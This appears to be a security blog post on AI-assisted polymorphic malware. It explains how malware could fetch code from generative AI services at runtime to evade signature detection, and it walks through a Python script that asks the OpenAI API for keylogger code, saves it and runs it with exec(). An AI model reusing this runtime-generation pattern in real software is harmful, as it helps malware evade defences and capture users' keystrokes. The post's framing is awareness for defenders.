Polymorphic Malware Using #AI

In the ever-evolving landscape of cybersecurity, malicious actors constantly seek new ways to infiltrate computer systems, wreak havoc, and exploit vulnerabilities. One of their most insidious tools is polymorphic malware, a shape-shifting threat that challenges traditional defense mechanisms and poses a formidable challenge to organizations and individuals alike. In this blog post I will investigate how attackers could abuse the usage of artificial intelligence in order to enhance polymorphism. This entire post gets inspired by Building BlackMamba a great work made by Hays.com.

Polymorphism

Polymorphic malware is a sophisticated class of malicious software designed to mutate its code while preserving its core functionality. It achieves this by employing various obfuscation techniques that alter its appearance with each iteration, making detection and analysis a daunting task for even the most advanced security systems.

The term “polymorphic” stems from the Greek words “poly” meaning many and “morphe” meaning form. Much like a chameleon changes its color to blend into its surroundings, polymorphic malware adapts its structure, characteristics, and even its digital signature to camouflage itself from detection. This dynamic nature allows it to bypass traditional antivirus solutions, intrusion detection systems, and other security measures that rely on static signatures or patterns.

The primary objective of polymorphic malware is to remain undetected during the initial infection stage and persistently evade subsequent security measures. By constantly changing its code and behavior, it can effectively deceive security solutions, prolong its stay within the target system, and establish a foothold for carrying out malicious activities such as data theft, remote control, or launching further attacks.

To achieve its shape-shifting capabilities, polymorphic malware employs a range of techniques, including encryption, code obfuscation, self-modification, and randomization. Encryption is commonly used to encrypt the core payload, making it difficult for security solutions to analyze or identify the underlying malicious code. Code obfuscation techniques, such as instruction reordering or inserting meaningless instructions, further complicate the analysis process by generating multiple versions of the malware that all achieve the same outcome.

Generative Artificial Intelligence and Code Writing

Traditionally, coding was the exclusive domain of human programmers who painstakingly crafted lines of code to bring software applications to life. However, with the advent of generative AI, the process of code writing has undergone a profound evolution. By leveraging the power of deep learning and neural networks, AI models can now analyze vast amounts of existing code and generate new, functional code that exhibits the same logic and structure as that written by humans.

One of the fundamental principles behind generative AI’s ability to write code lies in its capacity to understand patterns, logic, and syntax within existing codebases. By training on vast repositories of open-source code, AI models can learn to recognize and mimic the underlying structure and style that characterizes human-written code. This remarkable feat is made possible by neural networks’ ability to capture the essence of programming languages and generalize it into a set of rules and patterns.

To illustrate the power of generative AI in code writing, let’s consider a simple example. Imagine we want to generate a Python function that calculates the factorial of a given number. Traditionally, a human programmer would write a function like this:

def factorial(n):
    if n == 0:
        return 1
    else:
        return n * factorial(n-1)

Now, let’s observe how generative AI can generate a function with similar functionality:

def factorial(n):
    result = 1
    while n > 0:
        result *= n
        n -= 1
    return result

In this example, the generative AI model has successfully learned the concept of a factorial function and its iterative implementation. While the generated code may differ slightly from the human-written code, the essential logic and behavior remain intact.

Polymorphic AI Generated Code

The combination of Polymorphism and artificial intelligence’s code generation capabilities opens up the potential for creating highly evasive malware. Take a look at the following code snippet (excerpted from source HERE) to understand this concept better. Imagine a malware that dynamically reaches out to reputable domains known for offering generative intelligence, like openai.com or google.com, and requests the creation of specific functionalities in well-formed code.

Subsequently, the malware can import the generated code using reflection or dynamic loading functions. This approach ensures that the malicious code, being automatically generated, doesn’t reside within the infected artifact itself, making it virtually undetectable by traditional defensive systems. By leveraging this technique, malware gains a level of transparency that evades detection and poses a significant challenge for security measures. One more explicit code would be the follwoing one:

import openai
import keyboard

# Set up your OpenAI API credentials
openai.api_key = 'YOUR_API_KEY'

# Function to generate the keylogger code using OpenAI API
def generate_keylogger_code():
    prompt = "import keyboard\n\nkeyboard.on_press(lambda event: print(event.name))\nkeyboard.wait()"

    response = openai.Completion.create(
        engine='davinci-codex',
        prompt=prompt,
        max_tokens=100,
        n=1,
        stop=None,
        temperature=0.7
    )

    return response.choices[0].text.strip()

# Generate the keylogger code using OpenAI API
keylogger_code = generate_keylogger_code()

# Save the code to a file
with open('keylogger.py', 'w') as file:
    file.write(keylogger_code)

# Run the keylogger code
exec(keylogger_code)

In this specific case the attacker is leveraging the power of OpenAI’s GPT-3.5 model, specifically the davinci-codex engine, to generate a keylogger code. A keylogger is a program that records keystrokes on a computer, which can be useful for various purposes such as monitoring or debugging. We’ll walk through the code step by step and explain how each component works.

Setting Up OpenAI API Credentials: Before we dive into the code, make sure you have your OpenAI API credentials ready. You’ll need an API key to authenticate your requests to the OpenAI API. Replace the placeholder 'YOUR_API_KEY' in the code with your actual API key.

Generating the Keylogger Code: The heart of this code lies in the generate_keylogger_code() function. It utilizes the OpenAI API to generate the keylogger code based on a provided prompt. The prompt in this case is a basic code snippet that uses the keyboard library to capture key presses and print them to the console. The function sends this prompt to the OpenAI API and retrieves a completion, which is the generated keylogger code.

To use the OpenAI API, we create a Completion object by calling openai.Completion.create(). We specify the engine as ‘davinci-codex’, which is the language model we want to use. The prompt parameter contains the code snippet to generate the keylogger code. Other parameters, such as max_tokens and temperature, control the length and randomness of the generated completion.

Saving the Keylogger Code: Once we have the keylogger code, we save it to a file named 'keylogger.py' using a with statement and the write() method. This step allows us to store the generated code for later use or modifications.

Running the Keylogger: The final step is to execute the generated keylogger code using the exec() function. This runs the code within the current Python environment, activating the keylogger functionality. Be cautious when running keyloggers and ensure you comply with legal and ethical considerations.

Conclusion

In conclusion, the utilization of AI generative code empowers attackers to enhance their proficiency and velocity in crafting rapid and more sophisticated evasive code. This newfound power poses significant challenges in the realm of cybersecurity. It is crucial for defenders to stay ahead of the curve by continuously enhancing their defensive strategies and adopting advanced techniques to mitigate the evolving threat landscape posed by AI-driven malicious code. Vigilance, proactive measures, and ongoing research and development are imperative to safeguarding critical systems and data from the escalating risks presented by AI-enabled attacks.